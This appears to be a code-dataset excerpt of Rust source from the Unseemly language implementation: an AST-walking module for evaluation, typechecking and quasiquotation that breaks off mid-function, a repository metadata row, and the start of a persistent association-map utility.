// A lot of language implementation consists of walking an `Ast` while maintaining an environment. // // Our `Ast`s have baked-in information about // what should happen environment-wise, // so `walk` processes `ExtendEnv` and `VariableReference` on its own. // When it reaches a `Node`, the `Form` of that node specifies what to do, using a `WalkRule`. // The most interesting `WalkRule`, `Custom`, // specifies an arbitrary function on the results of walking its subterms, // but a lot of forms can use `Body`, // which means that the `Ast` structure already did all the work. // Subterms are walked lazily, since not all of them are even evaluable/typeable, // and they might need to be walked in a specific order. // There are different kinds of walks. Here are the major ones Unseemly needs so far: // // Evaluation produces a `Value` or an error. // During evaluation, each `lambda` form may be processed many times, // with different values for its parameters. // // Typechecking produces `Ast` or an error. // During typechecking, each `lambda` form is processed once, // using its parameters' declared types. // // Subtyping produces `Ast` (irrelevant) or an error. // It only walks type Asts, so `lambda` is not walked, // but ∀ is a binding form that acts sort of like type-level lambda, // except we use unification instead of explicit "function" calls. // // Quasiquotation, typically a part of evaluation, produces a `Value::AbstractSyntax`. // Typically, it is triggered by a specific quotative form, // and it's very simple to implement; it just reifies syntax // (until it hits a dotdotdot or unquote). // Unseemly is special in that `lambda` even binds under quasiquotation, // despite the fact that it doesn't do anything until the reified syntax is evaluated. // When we walk an `Ast`, we encounter many different forms. // // Some forms are positive, and some are negative. // // Positive forms (e.g. 
expressions and variable references) // are walked in an environment, and produce a "result" value. // // Negative forms (e.g. patterns and variable bindings) // still can access their environment, // but primarily they look at one special "context value" in it, and when they are walked, // they produce an environment from that context value. // // For example, suppose that `five` has type `nat` and `hello` has type `string`: // - the expression `struct{a: five, b: hello}` produces the type `struct{a: nat, b: string}` // - the pattern `struct{a: aa, b: bb}` produces // the envirnonment where `aa` is `nat` and `bb` is `string`. // // At runtime, something similar happens with values and value environments. // // Some forms are "ambidextrous". // Everything should be ambidextrous under quasiquotation, // because all syntax should be constructable and matchable. use crate::{ ast::{Ast, AstContents::*}, beta::*, name::*, runtime::{eval, reify}, util::{assoc::Assoc, mbe::EnvMBE}, walk_mode::{Dir, WalkElt, WalkMode}, }; use std::{cell::RefCell, rc::Rc}; /// A closed `Elt`; an `Elt` paired with an environment with which to interpret its free names. #[derive(Clone, Debug, PartialEq)] pub struct Clo<Elt: WalkElt> { pub it: Elt, pub env: Assoc<Name, Elt>, } impl<Elt: WalkElt> Clo<Elt> { pub fn env_merge(self, other: &Clo<Elt>) -> (Elt, Elt, Assoc<Name, Elt>) { // To reduce name churn (and keep environments from exploding in size), // we cut out the bits of the environments that are the same. 
let o_different_env = other.env.cut_common(&self.env); let o_renaming = o_different_env.keyed_map_borrow_f(&mut |name, _| ast!((vr name.freshen()))); let mut fresh_o_env = Assoc::new(); for (o_name, o_val) in o_different_env.iter_pairs() { fresh_o_env = fresh_o_env.set( o_renaming.find(o_name).unwrap().vr_to_name(), // HACK: VR -> Name Elt::from_ast(&crate::alpha::substitute(&Elt::to_ast(o_val), &o_renaming)), ); } ( self.it, Elt::from_ast(&crate::alpha::substitute(&Elt::to_ast(&other.it), &o_renaming)), self.env.set_assoc(&fresh_o_env), ) } } thread_local! { // Tuple elements are (layers deep, number of steps taken). pub static ast_walk_layer: RefCell<(u32, u32)> = RefCell::new((0, 0)); pub static ld_enabled: bool = std::env::var("UNSEEMLY_TRACE").map(|t| t == "full") == Ok(true); } /// Make a `<Mode::D as Dir>::Out` by walking `node` in the environment from `walk_ctxt`. /// `walk_ctxt` is used as an environment, /// and by betas to access other parts of the current node. pub fn walk<Mode: WalkMode>( a: &Ast, walk_ctxt: &LazyWalkReses<Mode>, ) -> Result<<Mode::D as Dir>::Out, Mode::Err> { layer_watch! { ast_walk_layer : // TODO: can we get rid of the & in front of our arguments and save the cloning? // TODO: this has a lot of direction-specific runtime hackery. // Maybe we want separate positive and negative versions? let (a, walk_ctxt) = match a.c() { // HACK: We want to process EE before pre_match before everything else. // This probably means we should find a way to get rid of pre_match. // But we can't just swap `a` and the ctxt when `a` is LiteralLike and the ctxt isn't. 
ExtendEnv(_,_) => { (a.clone(), walk_ctxt.clone()) } _ => Mode::D::pre_walk(a.clone(), walk_ctxt.clone()) }; ld!(ast_walk_layer, ld_enabled, "{} {}", Mode::name(), a); // lc!(ast_walk_layer, ld_enabled, " from: {}", walk_ctxt.this_ast); // match walk_ctxt.env.find(&negative_ret_val()) { // Some(ref ctxt) => lc!(ast_walk_layer, ld_enabled, " ctxt: {}", ctxt), _ => {}}; // lc!(ast_walk_layer, ld_enabled, " in: {}", walk_ctxt.env/*.map_borrow_f(&mut |_| "…")*/); let literally : Option<bool> = // If we're under a wrapper, `this_ast` might not be a Node match a.c() { QuoteMore(_,_) | QuoteLess(_,_) | ExtendEnv(_,_) | ExtendEnvPhaseless(_,_) => { match walk_ctxt.this_ast.c() { // `this_ast` might be `NotWalked` (and non-literal) if under `switch_mode`. // It's weird, but seems to be the right thing Node(f, _, _) => Some(Mode::get_walk_rule(f).is_literally()), _ => None } } _ => None }; match a.c() { Node(f, parts, _) => { let mut new_walk_ctxt = walk_ctxt.switch_ast(parts, a.clone()); heal__lwr_splices(&mut new_walk_ctxt)?; // certain walks only work on certain kinds of AST nodes match Mode::get_walk_rule(f) { Custom(ref ts_fn) => ts_fn(new_walk_ctxt), Body(n) => walk(parts.get_leaf(n).unwrap(), &new_walk_ctxt), LiteralLike => Mode::walk_quasi_literally(a.clone(), &new_walk_ctxt), NotWalked => icp!("{:#?} should not be walked at all!", a) } } IncompleteNode(parts) => { icp!("{:#?} isn't a complete node", parts)} VariableReference(n) => { Mode::walk_var(*n, &walk_ctxt) } Atom(n) => { Mode::walk_atom(*n, &walk_ctxt) } // TODO: we need to preserve these in LiteralLike contexts!! // So do we just set the context element at the wrong level and then grab it for the shift? // I guess so. QuoteMore(body, pos_inside) => { let oeh_m = Mode::D::oeh_if_negative(); let old_ctxt_elt = walk_ctxt.maybe__context_elt(); let currently_positive = oeh_m.is_none(); // kinda a hack for "Is `Mode` positive?" // Negative modes at quotation does some weird stuff. 
For example: // `match e { `[Expr | (add 5 ,[Expr<Nat> | a],)]` => ⋯}` // ^--- `quote_more` here (`get_res` produces `Expr<Nat>`), // which we already knew. // ^--- `quote_less`, and we get {a => Expr<Nat>} // We need to smuggle out what we know at each `quote_less` (there might be many), // so that `a` winds up bound to `Expr<Nat>` on the RHS. // If the quotation (outside) is negative, we need to unsquirrel no matter the inside. // If both are positive, return the result (so the form can do `Nat` → `Expr<Nat>`). // Otherwise, the context (expected type) is the result. if pos_inside == &currently_positive { // stay in the same mode? let inner_walk_ctxt = walk_ctxt.quote_more(oeh_m.clone()); let res = maybe_literally__walk(&a, body, inner_walk_ctxt, old_ctxt_elt, literally)?; match oeh_m { None => Ok(res), // positive walk, result is useful. Otherwise, unsquirrel: Some(oeh) => { Ok( Mode::env_as_out((*oeh.borrow()).clone()) ) } } } else { let inner_walk_ctxt = walk_ctxt .switch_mode::<Mode::Negated>().quote_more(oeh_m.clone()); let _ = maybe_literally__walk(&a, body, inner_walk_ctxt, old_ctxt_elt, literally)?; match oeh_m { // HACK: just return the context element (and massage the type) None => Mode::walk_var(negative_ret_val(), &walk_ctxt), Some(oeh) => { Ok( Mode::env_as_out((*oeh.borrow()).clone()) ) } } } } QuoteLess(body, depth) => { let old_ctxt_elt = walk_ctxt.maybe__context_elt(); let mut oeh = None; let mut walk_ctxt = walk_ctxt; for _ in 0..*depth { let (oeh_new, walk_ctxt_new) = walk_ctxt.quote_less(); oeh = oeh_new; walk_ctxt = walk_ctxt_new; } let res = maybe_literally__walk(&a, body, walk_ctxt, old_ctxt_elt, literally)?; squirrel_away::<Mode>(oeh, res.clone()); Ok(res) } Trivial | Shape(_) => { icp!("{:#?} is not a walkable AST in {}", a, Mode::name()); } ExtendEnv(ref body, ref beta) | ExtendEnvPhaseless(ref body, ref beta) => { let phaseless = matches!(a.c(), ExtendEnvPhaseless(_,_)); fn extract__ee_body<Mode: WalkMode>(e: <Mode as WalkMode>::Elt) -> 
<Mode as WalkMode>::Elt { match e.to_ast().c() { ExtendEnv(ref body, _) | ExtendEnvPhaseless(ref body, _) => { <Mode as WalkMode>::Elt::from_ast(body) } _ => { e } // Match will fail } } let new__walk_ctxt = if !Mode::automatically_extend_env() { walk_ctxt.clone() } else if phaseless { let extension = &env_from_beta(beta, &walk_ctxt)?; LazyWalkReses { env: walk_ctxt.env.set_assoc(extension), prelude_env: walk_ctxt.prelude_env.set_assoc(extension), more_quoted_env: walk_ctxt.more_quoted_env.iter().map( |e| e.set_assoc(extension)).collect(), less_quoted_env: walk_ctxt.less_quoted_env.iter().map( |e| e.set_assoc(extension)).collect(), .. walk_ctxt.clone() } } else { walk_ctxt.with_environment(walk_ctxt.env.set_assoc(&env_from_beta(beta, &walk_ctxt)?)) }; let new__walk_ctxt = // If the RHS is also binding, assume it's the same // TODO: we should make this only happen if we're actually negative. // The context element is sometimes leftover from a previous negative walk. new__walk_ctxt.with_context(extract__ee_body::<Mode>( walk_ctxt.env.find(&negative_ret_val()).unwrap_or( &<Mode as WalkMode>::Elt::from_ast(&ast!((trivial)))).clone())); maybe_literally__walk(&a, body, new__walk_ctxt, walk_ctxt.maybe__context_elt().map(extract__ee_body::<Mode>), literally) } } } } // This fixes up `walk_ctxt` based on splice healing. 
// TODO #40: Its effects on the rest of the code are too complex: // * `extra_env` needs to be used in various places, but exactly where is fuzzy // * `walk_ctxt` goes out of sync with its `Ast`; // Negative::walk_quasi_literally was using the Ast but had to switch to using the `walk_ctxt` fn heal__lwr_splices<Mode: WalkMode>(walk_ctxt: &mut LazyWalkReses<Mode>) -> Result<(), Mode::Err> { if !Mode::needs__splice_healing() { return Ok(()); // only do this once, at the top level } let orig_walk_ctxt = walk_ctxt.clone(); if Mode::D::is_positive() { walk_ctxt.parts.heal_splices::<Mode::Err>(&|lwt: &Rc<LazilyWalkedTerm<Mode>>| { if let Node(sub_f, sub_parts, _) = lwt.term.c() { if let Some((envs, new_term)) = Mode::perform_splice_positive( sub_f, &orig_walk_ctxt.clone().switch_ast(sub_parts, lwt.term.clone()), )? { Ok(Some( envs.into_iter() .map(|env| { Rc::new(LazilyWalkedTerm { term: new_term.clone(), res: lwt.res.clone(), extra_env: env, }) }) .collect::<Vec<_>>(), )) } else { Ok(None) } } else { Ok(None) } })?; } else { let its_a_trivial_ast = EnvMBE::new(); let context_ast = walk_ctxt.context_elt().to_ast(); let other_parts = match (&context_ast.c(), &walk_ctxt.this_ast.c()) { (&Node(ref f, ref p, _), &Node(ref f_this, _, _)) => { if f != f_this { // Mismatched ASTs; some subtyping rules allow this, but healing is nonsensical return Ok(()); } p } _ => &its_a_trivial_ast, }; // Note that this is asymmetric: // the walked Ast conforms itself to fit the context element. // In practice, that seems to be what subtyping wants. // Is this a coincidence? walk_ctxt.parts.heal_splices__with::<Mode::Err, Ast>( other_parts, &|lwt: &Rc<LazilyWalkedTerm<Mode>>, sub_other_thunk: &dyn Fn() -> Vec<Ast>| { if let Node(ref sub_f, ref sub_parts, _) = lwt.term.c() { // TODO: negative if let Some((envs, new_term)) = Mode::perform_splice_negative( sub_f, &orig_walk_ctxt.clone().switch_ast(sub_parts, lwt.term.clone()), sub_other_thunk, )? 
{ Ok(Some( envs.into_iter() .map(|env| { Rc::new(LazilyWalkedTerm { term: new_term.clone(), res: lwt.res.clone(), extra_env: env, }) }) .collect::<Vec<_>>(), )) } else { Ok(None) } } else { Ok(None) } }, )?; } Ok(()) } /// If a `Node` is `LiteralLike`, its imports and [un]quotes should be, too! fn maybe_literally__walk<Mode: WalkMode>( a: &Ast, body: &Ast, walk_ctxt: LazyWalkReses<Mode>, ctxt_elt: Option<Mode::Elt>, literally: Option<bool>, ) -> Result<<Mode::D as Dir>::Out, Mode::Err> { let walk_ctxt = match ctxt_elt { Some(e) => walk_ctxt.with_context(e), None => walk_ctxt, }; // It might be right to assume that it's true if the mode is quasiquotation if literally.expect("ICP: unable to determine literalness") { Mode::walk_quasi_literally(a.clone(), &walk_ctxt) } else { walk(&*body, &walk_ctxt) } } /// How do we walk a particular node? This is a super-abstract question, hence all the `<>`s. #[derive(Clone)] pub enum WalkRule<Mode: WalkMode> { /// A function from the types/values of the *parts* of this form /// to the type/value of this form. /// The environment is accessible via the `LazyWalkReses`. /// Any of the other `WalkRule`s can be implemented as a simple `Custom`. Custom(Rc<Box<(dyn Fn(LazyWalkReses<Mode>) -> Result<<Mode::D as Dir>::Out, Mode::Err>)>>), /// "this form has the same type/value as one of its subforms". /// (useful for forms that only exist as wrapper s around other AST nodes) Body(Name), /// "traverse the subterms, and rebuild this syntax around them". /// Only valid in modes where `Ast`s can be converted to `::Elt`s. LiteralLike, /// "this form should not ever be walked". NotWalked, } impl<Mode: WalkMode> WalkRule<Mode> { fn is_literally(&self) -> bool { matches!(self, LiteralLike) } } // trait bounds on parameters and functions are not yet supported by `Reifiable!` impl<Mode: WalkMode + Copy + 'static> reify::Reifiable for WalkRule<Mode> { // Maybe there's some magic we can do somewhere to make this opaque? 
fn ty_name() -> Name { n("WalkRule") } fn concrete_arguments() -> Option<Vec<Ast>> { Some(vec![Mode::ty_invocation()]) } fn reify(&self) -> eval::Value { match *self { NotWalked => val!(enum "NotWalked",), Body(ref n) => val!(enum "Body", (, n.reify())), Custom(ref lwr_to_out) => val!(enum "Custom", (, reify::reify_1ary_function(lwr_to_out.clone()))), LiteralLike => val!(enum "LiteralLike",), } } fn reflect(v: &eval::Value) -> Self { extract!((v) eval::Value::Enum = (ref choice, ref parts) => if choice.is("NotWalked") { WalkRule::NotWalked } else if choice.is("Body") { WalkRule::Body(Name::reflect(&parts[0])) } else if choice.is("Custom") { WalkRule::Custom(reify::reflect_1ary_function(parts[0].clone())) } else if choice.is("LiteralLike") { WalkRule::LiteralLike } else { icp!() }) } } impl<Mode: WalkMode> std::fmt::Debug for WalkRule<Mode> { fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { match *self { NotWalked => write!(f, "NotWalked"), Body(ref n) => write!(f, "Body({})", n), Custom(_) => write!(f, "Custom(-)"), LiteralLike => write!(f, "LiteralLike"), } } } pub use self::WalkRule::*; /// An environment of walked things. pub type ResEnv<Elt> = Assoc<Name, Elt>; /// A term where the results of walking subterms is memoized. #[derive(Debug)] pub struct LazilyWalkedTerm<Mode: WalkMode> { pub term: Ast, pub res: RefCell<Option<Result<<Mode::D as Dir>::Out, Mode::Err>>>, /// This is a hack; it's specifically for the dotdotdot type. /// Maybe it needs generalization in some direction. 
pub extra_env: Assoc<Name, Mode::Elt>, } // trait bounds on parameters are not yet supported by `Reifiable!` impl<Mode: WalkMode> reify::Reifiable for LazilyWalkedTerm<Mode> { fn ty_name() -> Name { n("LazilyWalkedTerm") } fn concrete_arguments() -> Option<Vec<Ast>> { Some(vec![Mode::ty_invocation()]) } fn reify(&self) -> eval::Value { val!(struct "term" => (, self.term.reify()), "res" => (, self.res.reify()), "extra_env" => (, self.extra_env.reify())) } fn reflect(v: &eval::Value) -> Self { extract!((v) eval::Value::Struct = (ref contents) => LazilyWalkedTerm { term: Ast::reflect(contents.find_or_panic(&n("term"))), res: RefCell::<Option<Result<<Mode::D as Dir>::Out, Mode::Err>>>::reflect( contents.find_or_panic(&n("res"))), extra_env: Assoc::<Name, Mode::Elt>::reflect(contents.find_or_panic(&n("extra_env"))) }) } } // We only implement this because lazy-rust is unstable impl<Mode: WalkMode> LazilyWalkedTerm<Mode> { pub fn new(t: &Ast) -> Rc<LazilyWalkedTerm<Mode>> { Rc::new(LazilyWalkedTerm { term: t.clone(), res: RefCell::new(None), extra_env: Assoc::new(), }) } /// Get the result of walking this term (memoized) fn get_res( &self, cur_node_contents: &LazyWalkReses<Mode>, ) -> Result<<Mode::D as Dir>::Out, Mode::Err> { self.memoized(&|| { // stab-in-the-dark optimization, but this function gets called a *lot*: if self.extra_env.empty() { walk::<Mode>(&self.term, cur_node_contents) } else { walk::<Mode>( &self.term, &cur_node_contents .with_environment(cur_node_contents.env.set_assoc(&self.extra_env)), ) } }) } fn memoized( &self, f: &dyn Fn() -> Result<<Mode::D as Dir>::Out, Mode::Err>, ) -> Result<<Mode::D as Dir>::Out, Mode::Err> { let result = self.res.borrow_mut().take().unwrap_or_else(f); *self.res.borrow_mut() = Some(result.clone()); result } fn clear_memo(&self) { *self.res.borrow_mut() = None; } } pub type OutEnvHandle<Mode> = Rc<RefCell<Assoc<Name, <Mode as WalkMode>::Elt>>>; /// Only does anything if `Mode` is negative. 
pub fn squirrel_away<Mode: WalkMode>( opt_oeh: Option<OutEnvHandle<Mode>>, more_env: <Mode::D as Dir>::Out, ) { if let Some(oeh) = opt_oeh { let new_env = oeh.borrow().set_assoc(&Mode::out_as_env(more_env)); *oeh.borrow_mut() = new_env; } } /// Package containing enough information to walk the subforms of some form on-demand. /// /// It is safe to have unwalkable subforms, as long as nothing ever refers to them. /// /// Contents probably shouldn't be `pub`... #[derive(Debug, Clone)] pub struct LazyWalkReses<Mode: WalkMode> { /// Things that we have walked and that we might walk pub parts: EnvMBE<Rc<LazilyWalkedTerm<Mode>>>, /// The environment of the overall walk. pub env: ResEnv<Mode::Elt>, /// The environment to use when entering a new phase. /// It's like a prelude, except that it's affected by syntax extensions. pub prelude_env: ResEnv<Mode::Elt>, /// The environment for syntax quotation (deeper on the front, shallower on the back) pub more_quoted_env: Vec<ResEnv<Mode::Elt>>, /// The environment for interpolation (further out on the front, nearer on the back) pub less_quoted_env: Vec<ResEnv<Mode::Elt>>, /// For all the less-quoted walks ongoing whose direction is negative, /// we need to smuggle out results. /// This is a stack of (optional, because not all walks are negative) mutable handles /// to the environments being accumulated. 
pub less_quoted_out_env: Vec<Option<OutEnvHandle<Mode>>>, pub this_ast: Ast, pub extra_info: Mode::ExtraInfo, } // trait bounds on parameters are not yet supported by `Reifiable!` impl<Mode: WalkMode> reify::Reifiable for LazyWalkReses<Mode> { fn ty_name() -> Name { n("LazyWalkedReses") } fn concrete_arguments() -> Option<Vec<Ast>> { Some(vec![Mode::ty_invocation()]) } fn reify(&self) -> eval::Value { val!(struct "parts" => (, self.parts.reify()), "env" => (, self.env.reify()), "prelude_env" => (,self.prelude_env.reify()), "more_quoted_env" => (,self.more_quoted_env.reify()), "less_quoted_env" => (,self.less_quoted_env.reify()), "less_quoted_out_env" => (,self.less_quoted_out_env.reify()), "this_ast" => (, self.this_ast.reify()), "extra_info" => (, self.extra_info.reify())) } fn reflect(v: &eval::Value) -> Self { extract!((v) eval::Value::Struct = (ref contents) => LazyWalkReses { parts: EnvMBE::<Rc<LazilyWalkedTerm<Mode>>>::reflect( contents.find_or_panic(&n("parts"))), env: ResEnv::<Mode::Elt>::reflect( contents.find_or_panic(&n("env"))), prelude_env: ResEnv::<Mode::Elt>::reflect( contents.find_or_panic(&n("prelude_env"))), more_quoted_env: Vec::<ResEnv<Mode::Elt>>::reflect( contents.find_or_panic(&n("more_quoted_env"))), less_quoted_env: Vec::<ResEnv<Mode::Elt>>::reflect( contents.find_or_panic(&n("less_quoted_env"))), less_quoted_out_env: Vec::<Option<Rc<RefCell<Assoc<Name,Mode::Elt>>>>>::reflect( contents.find_or_panic(&n("less_quoted_out_env"))), this_ast: Ast::reflect( contents.find_or_panic(&n("this_ast"))), extra_info: Mode::ExtraInfo::reflect( contents.find_or_panic(&n("extra_info")))}) } } impl<Mode: WalkMode> LazyWalkReses<Mode> { pub fn new( env: ResEnv<Mode::Elt>, prelude_env: ResEnv<Mode::Elt>, this_ast: Ast, ) -> LazyWalkReses<Mode> { LazyWalkReses { env: env, prelude_env: prelude_env, more_quoted_env: vec![], less_quoted_env: vec![], less_quoted_out_env: vec![], parts: match this_ast.maybe_node_parts() { Some(parts_unwalked) => 
parts_unwalked.map(&mut LazilyWalkedTerm::new), None => EnvMBE::new(), }, this_ast: this_ast, extra_info: std::default::Default::default(), } } /// Slight hack: this is just to get a recursion started with some environment. /// Only use this in tests or at the top level; this discards any non-phase-0-environments! /// TODO: this is actually used a bunch of places; maybe we should be passing LWR instead. /// Maybe LWR should be renamed. pub fn new_wrapper(env: ResEnv<Mode::Elt>) -> LazyWalkReses<Mode> { LazyWalkReses { env: env.clone(), prelude_env: env, more_quoted_env: vec![], less_quoted_env: vec![], less_quoted_out_env: vec![], parts: EnvMBE::new(), // TODO #46: This sets us up with a "default" value for `literally`. this_ast: ast!({ crate::form::simple_form("wrapper", crate::grammar::FormPat::Impossible); }), extra_info: std::default::Default::default(), } } pub fn new_mq_wrapper( env: ResEnv<Mode::Elt>, mqe: Vec<ResEnv<Mode::Elt>>, ) -> LazyWalkReses<Mode> { LazyWalkReses { env: env, prelude_env: Assoc::new(), more_quoted_env: mqe, less_quoted_env: vec![], less_quoted_out_env: vec![], // If we want a `lqe`, we need to fill this in, too! parts: EnvMBE::new(), // TODO #46: This sets us up with a "default" value for `literally`. this_ast: ast!({ crate::form::simple_form("wrapper", crate::grammar::FormPat::Impossible); }), extra_info: std::default::Default::default(), } } pub fn new_empty() -> LazyWalkReses<Mode> { Self::new_wrapper(Assoc::new()) } pub fn switch_ast(self, parts: &EnvMBE<Ast>, this_ast: Ast) -> LazyWalkReses<Mode> { LazyWalkReses { parts: parts.map(&mut LazilyWalkedTerm::new), this_ast: this_ast, ..self } } pub fn this_form(&self) -> Rc<crate::form::Form> { match self.this_ast.c() { Node(ref f, _, _) => f.clone(), _ => icp!(), } } /// The result of walking the subform named `part_name`. This is memoized. 
pub fn get_res(&self, part_name: Name) -> Result<<Mode::D as Dir>::Out, Mode::Err> { self.parts.get_leaf_or_panic(&part_name).get_res(self) } /// Will `get_res` or `get_term` panic? /// Rarely used, because a form typically knows which named subterms it has based on parsing. pub fn has(&self, part_name: Name) -> bool { self.parts.get_leaf(part_name).is_some() } /// Like `get_res`, but for subforms that are repeated at depth 1. Sort of a hack. pub fn get_rep_res(&self, part_name: Name) -> Result<Vec<<Mode::D as Dir>::Out>, Mode::Err> { self.parts.get_rep_leaf_or_panic(part_name).iter().map(|&lwt| lwt.get_res(self)).collect() } /// Like `get_res`, but with `depth` levels of repetition, and calling `f` to flatten the result pub fn flatten_res_at_depth( &self, part_name: Name, depth: u8, map: &dyn Fn(<Mode::D as Dir>::Out) -> <Mode::D as Dir>::Out, flatten: &dyn Fn(Vec<<Mode::D as Dir>::Out>) -> <Mode::D as Dir>::Out, ) -> Result<<Mode::D as Dir>::Out, Mode::Err> { self.parts.map_flatten_rep_leaf_or_panic( part_name, depth, &|lwt: &Rc<LazilyWalkedTerm<Mode>>| -> Result<<Mode::D as Dir>::Out, Mode::Err> { lwt.get_res(self).map(map) }, &|v: Vec<Result<<Mode::D as Dir>::Out, Mode::Err>>| { let mut accum = vec![]; for elt in v { accum.push(elt?); } Ok(flatten(accum)) }, ) } /// Like `flatten_res_at_depth`, but uses `leaf` instead of doing `get_res` /// TODO: this is used in only one place, and feels really awkward. 
pub fn flatten_generate_at_depth( &self, part_name: Name, depth: u8, generate: &dyn Fn() -> <Mode::D as Dir>::Out, flatten: &dyn Fn(Vec<<Mode::D as Dir>::Out>) -> <Mode::D as Dir>::Out, ) -> <Mode::D as Dir>::Out { self.parts.map_flatten_rep_leaf_or_panic( part_name, depth, &|_| -> <Mode::D as Dir>::Out { generate() }, &&|v: Vec<<Mode::D as Dir>::Out>| { let mut accum = vec![]; for elt in v { accum.push(elt); } flatten(accum) }, ) } /// Like `get_term`, but with `depth` levels of repetition, and calling `m` to map and `f` to /// flatten the result pub fn map_flatten_term_at_depth<S>( &self, part_name: Name, depth: u8, m: &dyn Fn(&Ast) -> S, f: &dyn Fn(Vec<S>) -> S, ) -> S { self.parts.map_flatten_rep_leaf_or_panic( part_name, depth, &|lwt: &Rc<LazilyWalkedTerm<Mode>>| -> S { return m(&lwt.term) }, f, ) } // /** Like `get_rep_res`, but doesn't panic if the name is absent. */ // pub fn maybe_get_rep_res(&self, part_name: &Name) -> Option<Result<Vec<<Mode::D as Dir>::Out>, Mode::Err>> { // self.parts.get_rep_leaf(part_name).map(|parts| // parts.iter().map( |&lwt| lwt.get_res(self)).collect()) // } /// The subform named `part_name`, without any processing. pub fn get_term(&self, part_name: Name) -> Ast {
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
true
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/util/assoc.rs
src/util/assoc.rs
use crate::runtime::reify::Reifiable;
use std::{clone::Clone, fmt, hash::Hash, rc::Rc};
extern crate im_rc;
use self::im_rc::HashMap;

// Thread-local counter backing `get_next_id`; gives each `Assoc` a distinct `id`.
thread_local! {
    static next_id: std::cell::RefCell<u32> = std::cell::RefCell::new(0);
}

// Hands out the current counter value and bumps it (unique within one thread).
fn get_next_id() -> u32 {
    next_id.with(|id| {
        let res = *id.borrow();
        *id.borrow_mut() += 1;
        res
    })
}

/// A persistent key-value store. `clone`, `set`, and `find` are sub-linear.
#[derive(Clone)]
pub struct Assoc<K, V>
where K: Eq + Hash + Clone
{
    // The backing persistent hash-array-mapped trie.
    hamt: HashMap<K, V>,
    // TODO: this is a hack, needed for `almost_ptr_eq`,
    // which in turn is only needed in `earley.rs`.
    // `earley.rs` should use interning as a replacement optimization, and `id` should be removed.
    id: u32,
}

impl<K: Eq + Hash + Clone, V: Clone + PartialEq> PartialEq for Assoc<K, V> {
    // `id` is not relevant for equality
    fn eq(&self, other: &Self) -> bool { self.hamt == other.hamt }
}

impl<K: Eq + Hash + Clone, V: Clone + Eq> Eq for Assoc<K, V> {}

impl<K: Eq + Hash + Clone, V: Clone> Default for Assoc<K, V> {
    fn default() -> Self { Self::new() }
}

impl<K: Eq + Hash + Clone + Reifiable, V: Clone + Reifiable> Reifiable for Assoc<K, V> {
    fn ty_name() -> crate::name::Name { crate::name::n("Assoc") }

    fn concrete_arguments() -> Option<Vec<crate::ast::Ast>> {
        Some(vec![K::ty_invocation(), V::ty_invocation()])
    }

    // Reifies as a `Sequence` of reified `(key, value)` pairs.
    // NOTE(review): HAMT iteration order is unspecified, so the order of the
    // resulting sequence may differ between otherwise-equal `Assoc`s.
    fn reify(&self) -> crate::runtime::eval::Value {
        let res: Vec<_> =
            self.hamt.iter().map(|(k, v)| Rc::new((k.clone(), v.clone()).reify())).collect();
        crate::runtime::eval::Value::Sequence(res)
    }

    // Inverse of `reify`: rebuilds the map by `set`ting each reflected pair.
    fn reflect(v: &crate::runtime::eval::Value) -> Self {
        let mut res = Assoc::<K, V>::new();
        extract!((v) crate::runtime::eval::Value::Sequence = (ref parts) => {
            for part in parts {
                let (k_part, v_part) = <(K,V)>::reflect(&**part);
                res = res.set(k_part, v_part);
            }
        });
        res
    }
}

impl<K: Eq + Hash + Clone + fmt::Debug, V: Clone + fmt::Debug> fmt::Debug for Assoc<K, V> {
    // Renders as `⟦k ⇒ v, …⟧`, using the `Debug` form of keys and values.
    fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
        write!(f, "⟦")?;
        let mut first = true;
        for (k, v) in self.iter_pairs() {
            if !first {
                write!(f, ", ")?;
            }
            write!(f, "{:#?} ⇒ {:#?}", k, v)?;
            first = false;
        }
        write!(f, "⟧")
    }
}

impl<K: Eq + Hash + Clone + fmt::Display, V: Clone + fmt::Display> fmt::Display for Assoc<K, V> {
    // Same shape as the `Debug` output, but with `Display` formatting.
    fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
        write!(f, "⟦")?;
        let mut first = true;
        for (k, v) in self.iter_pairs() {
            if !first {
                write!(f, ", ")?;
            }
            write!(f, "{} ⇒ {}", k, v)?;
            first = false;
        }
        write!(f, "⟧")
    }
}

// Maybe we should admit that `K` is always `Name` (=`usize`) and stop taking references to it?
// Maybe we shouldn't even parameterize over it?
impl<K: Eq + Hash + Clone, V: Clone> Assoc<K, V> {
    // Wraps a HAMT, stamping it with a fresh `id`
    // (so the result is not `almost_ptr_eq` to any pre-existing `Assoc`).
    fn from_hamt(hamt: HashMap<K, V>) -> Self { Assoc { hamt: hamt, id: get_next_id() } }

    /// An empty `Assoc`.
    pub fn new() -> Self { Self::from_hamt(HashMap::new()) }

    /// Looks up `key`; `None` if it is unbound.
    pub fn find(&self, key: &K) -> Option<&V> { self.hamt.get(key) }

    /// Returns a new `Assoc` with `key` bound to `value` (shadowing any old binding).
    pub fn set(&self, key: K, value: V) -> Self { Self::from_hamt(self.hamt.update(key, value)) }

    /// Returns a new `Assoc` with all of `other`'s bindings added;
    /// on collision, `other`'s binding wins (this is how environments get extended).
    pub fn set_assoc(&self, other: &Self) -> Self {
        Self::from_hamt(other.hamt.clone().union(self.hamt.clone()))
    }

    /// Union of the two maps, with `f` resolving value collisions.
    pub fn union_with<F>(&self, other: &Self, f: F) -> Self
    where F: FnMut(V, V) -> V {
        Self::from_hamt(self.hamt.clone().union_with(other.hamt.clone(), f))
    }

    /// In-place insertion.
    /// NOTE(review): keeps the old `id`, so the mutated `Assoc` remains
    /// `almost_ptr_eq` to its prior clones — presumably intentional, since that
    /// mimics genuine pointer equality under mutation; confirm against `earley.rs`.
    pub fn mut_set(&mut self, key: K, value: V) { self.hamt.insert(key, value); }

    /// A one-entry `Assoc`.
    pub fn single(key: K, value: V) -> Self { Self::new().set(key, value) }

    /// Is this `Assoc` empty?
    pub fn empty(&self) -> bool { self.hamt.is_empty() }

    /// Iterates over `(&K, &V)` pairs (order unspecified).
    pub fn iter_pairs(&self) -> im_rc::hashmap::Iter<K, V> { self.hamt.iter() }

    /// Iterates over keys (order unspecified).
    pub fn iter_keys(&self) -> im_rc::hashmap::Keys<K, V> { self.hamt.keys() }

    /// Iterates over values (order unspecified).
    pub fn iter_values(&self) -> im_rc::hashmap::Values<K, V> { self.hamt.values() }

    /// Maps `f` over the values, leaving keys untouched.
